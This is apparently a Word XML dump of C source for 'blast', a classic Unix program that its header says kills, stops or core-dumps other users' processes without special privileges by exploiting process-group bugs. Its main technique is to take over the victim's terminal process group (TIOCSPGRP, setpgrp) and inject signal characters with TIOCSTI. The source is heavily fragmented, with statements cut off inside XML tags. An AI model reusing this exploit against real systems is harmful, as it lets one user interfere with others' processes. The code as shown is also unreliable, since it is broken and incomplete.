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st: program to kill, core dump, or stop other programs,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ual priviledges. Shows off bugs involving process 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vid I. Bell. (alias D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</w:t>
        <w:tab/>
        <w:t>*str;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>/*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</w:t>
        <w:tab/>
        <w:t>*cp;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>/* character to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</w:t>
        <w:tab/>
        <w:t>pid;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>/* pid to b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grp;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>/* his process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sgttyb</w:t>
        <w:tab/>
        <w:t>sb;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>/* old and new tty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sgttyb</w:t>
        <w:tab/>
        <w:t>ns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tchars</w:t>
        <w:tab/>
        <w:t>tc;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>/* tty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tchars</w:t>
        <w:tab/>
        <w:t>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stderr, "usage: blast [-ksd] pid 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(0, TIOCGETP, &amp;sb);</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>/* turn off echo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b =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b.sg_flags &amp;= ~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(0, TIOCSETN, &amp;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octl(0, TIOCGETC, &amp;tc)) {</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>/* get our tty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ror("get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octl(0, TIOCGLTC, &amp;lc)) {</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>/* and local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ror("lget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++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= &amp;tc.t_intrc;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>/* default is k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setmask(-1);</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>/* save oursel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argc--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*arg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str == '-') {      /* an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(str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k':</w:t>
        <w:tab/>
        <w:t>/* kill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p = &amp;tc.t_int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s':</w:t>
        <w:tab/>
        <w:t>/* stop p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p = &amp;lc.t_sus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d':</w:t>
        <w:tab/>
        <w:t>/* dump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p = &amp;tc.t_quit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:</w:t>
        <w:tab/>
        <w:t>/* illeg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printf(stderr, "bad op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d = 0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*str) {</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>/* read p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d = pid *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*str &lt; '0') || (*str &gt; '9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stderr, "bad numb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d += (*str++ - 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rp = getpgrp(pid);</w:t>
        <w:tab/>
        <w:t>/* get victim's process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grp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ror("getpg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octl(0, TIOCSPGRP, &amp;pgrp)) {   /* set tty process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ror("ttyspg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etpgrp(0, pgrp)) {</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>/* set my own process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ror("spg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octl(0, TIOCSTI, cp)) {</w:t>
        <w:tab/>
        <w:t>/* stuff the char on my t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ror("s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ioctl(0, TIOCSETN, &amp;sb);</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>/* reset echo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